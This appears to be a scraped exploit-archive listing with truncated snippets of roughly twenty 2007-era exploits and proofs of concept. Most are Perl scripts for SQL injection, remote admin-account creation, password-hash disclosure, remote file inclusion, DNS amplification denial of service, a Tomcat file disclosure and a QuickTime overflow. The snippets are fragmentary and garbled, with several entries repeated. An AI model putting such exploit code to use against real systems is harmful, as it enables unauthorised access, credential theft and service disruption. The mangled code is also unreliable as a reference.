DNS Recursion Bandwidth Amplification - Denial of Service (PoC)

!/usr/bin/perl Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.2101.tar.gz cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well. PS: To see if you can spoof, check out the ANA Spoofer project. http://spoofer.csail.mit.edu/ Written by...

DNS Recursion Bandwidth Amplification - Denial of Service (PoC)

DNS Recursion Bandwidth Amplification - Denial of Service PoC !/usr/bin/perl Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.2101.tar.gz cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well. PS: To see if you can spoof, check out the A...

BBPortalS 2.0 - Blind SQL Injection

BBPortalS 2.0 - Blind SQL Injection BBPortalS BBsProcesS Remote Blind SQL Injection Exploit Bug Found And Write By Max007 Exploit Tested On V.1.5.10 And V.1.6.2 And 1.5.11 info:For The Version BBPortalS 2.0 name of field is user and password but you have to find name of table !/usr/bin/perl use...

BBPortalS <= 2.0 Remote Blind SQL Injection Exploit

Exploit for unknown platform in category web applications =================================================== BBPortalS get$sql; if!$res - content = /Warning/ print " The Current number of fields is : $err\n"; $err++; max007; else if$err=...

Simple Machines Forum multiple sql injection flaws with exploit code.

SMF is a very hardened php application. If anyone wants an example of some interesting PHP security SMF is a good place to look. Even after being able to injection SQL I had to take another step and bypass some difficult filters found in the dbquery function. Ultimately i was able to do so. This...

GCALDaemon &lt;= 1.0-beta13 Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl / GCALDaemon = 1.0-beta13 Remote DoS Original Advisory: http://www.securityfocus.com/bid/25704/info http://www.ikkisoft.com/stuff/SN-2007-01.txt Luca "ikki" Carettoni http://www.ikkisoft.com / use strict; use warnings; use IO::Socket; my $host =...

Apache Tomcat (webdav) Remote File Disclosure Exploit

No description provided by source. !/usr/bin/perl Apache Tomcat Remote File Disclosure Zeroday Xploit kcdarookie aka eliteb0y / 2007 thanx to the whole team & andi : +++KEEP PRIV8+++ This Bug may reside in different WebDav implementations, Warp your mind! +You will need auth for the exploit to...

cpdynalinks-sql.txt

!/usr/bin/perl cpDynaLinks 1.02 Remote Sql Inyection exploit download: http://www.cplinks.com/download/cpdynalinks/cpdynalinksversion102full.zip bug found by s0cratex exploit written by ka0x D.O.M TEAM 2007 d0rk: Powered by cpDynaLinks need magicquotesgpc off contact: ka0x@domlabs: perl...

MD-Pro 1.0.76 - SQL Injection

MD-Pro 1.0.76 - SQL Injection !/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author = "undefined1"; my $settings = "magicquotesruntime = off, mysql = 4.1.0"; $| = 1; print ":: $app $type - by $author ::\n\n\n"; my $url = shift || usage; if$url...

Flip 3.0 - Remote Admin Creation

Flip 3.0 - Remote Admin Creation !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admi...

Flip 3.0 - Remote Password Hash Disclosure

!/usr/bin/perl use strict; use IO::Socket; my $app = "Flip = 0; $data = substr$data, $index1+4; $index1 = 0; printf "%-20s %-32s\n", "username", "md5 hash"; while$index1 = index$data, "\n" = 0 my $hash = substr$data, 0, 32; my $index2 = index$data, ""; my $index3 = index$data, "", $index2+2; my...

Flip 3.0 - Remote Admin Creation

!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...

Flip <= 3.0 Remoe Admin Creation Exploit

Exploit for unknown platform in category web applications ======================================== Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin...

kwsmember-sql.txt

!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $User = $ARGV1; $passwd = $ARGV2; $url = "http://".$host; $port = "80"; print q Script....................: KwsPHP v1.0 MemberSpace Module Script Site...............: http://kws.koogar.org/ Vulnerability.............: Remote SQ...

KwsPHP 1.0 Member_Space Module - SQL Injection

!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $User = $ARGV1; $passwd = $ARGV2; $url = "http://".$host; $port = "80"; print q Script....................: KwsPHP v1.0 MemberSpace Module Script Site...............: http://kws.koogar.org/ Vulnerability.............: Remote SQ...

Ajax File Browser 3b - &#039;settings.inc.php?approot&#039; Remote File Inclusion

Ajax File Browser 3 Beta Remote File Inclusion found by the "arfis project" http://arfis.wordpress.com/ Project Info: ------------- Name: Ajax File Browser Link: http://sourceforge.net/projects/ajaxfb/ DL: http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip Vulnerabilit...

Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability

Exploit for unknown platform in category web applications ================================================================= Ajax File Browser 3b settings.inc.php approot RFI Vulnerability ================================================================= Ajax File Browser 3 Beta Remote File...

Apple Quicktime &lt; 7.2 SMIL Remote Integer Overflow PoC

No description provided by source. ---------------------------------------------------------------------- ATTACK VECTORS ---------------------------------------------------------------------- This vulnerability can be triggered by luring a target user into...

Apple QuickTime &lt; 7.2 - SMIL Remote Integer Overflow

---------------------------------------------------------------------- ATTACK VECTORS ---------------------------------------------------------------------- This vulnerability can be triggered by luring a target user into running a malicious SMIL file locally or via a webpage. In the later scenar...

ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print "\n |-------------------------------------------------|"; print "\n | newhackdotorg |"; print "\n |-------------------------------------------------|"; print "\n | ABC estore 3.0 catid Blind SQ...